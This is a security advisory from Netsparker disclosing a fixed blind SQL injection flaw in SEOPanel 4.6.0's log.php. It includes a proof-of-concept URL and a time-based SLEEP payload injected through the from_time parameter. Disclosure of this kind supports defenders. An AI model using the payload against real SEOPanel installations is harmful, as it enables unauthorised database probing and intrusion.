Information
--------------------

Advisory by Netsparker
Name: SQL Injection Vulnerability in SEOPanel
Affected Software: SEOPanel
Affected Versions: 4.6.0
Vendor Homepage: https://www.seopanel.org/
Vulnerability Type: SQL Injection
Severity: Critical
Status: Fixed
CVSS Score (3.0): AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:H
Netsparker Advisory Reference: NS-20-006

Technical Details
--------------------

Blind SQLI in log.php

URL: http://localhost:8080/log.php?cat_type&from_time=%27%2b((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2b%27&keyword=&sec=mail&status=success&to_time=2020-09-11
Parameter Name: from_t
Parameter Type: GET
Attack: '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

For more information on SQL Injection vulnerabilities read the article What is the SQL Injection Vulnerability & How to Prevent it?.

Advisory Timeline
--------------------

2nd November 2020 - First Contact
30th November  2020 - Vendor Fixed
28th December 2020 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Timur Guvenkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be highly accurate in reporting vulnerabilities.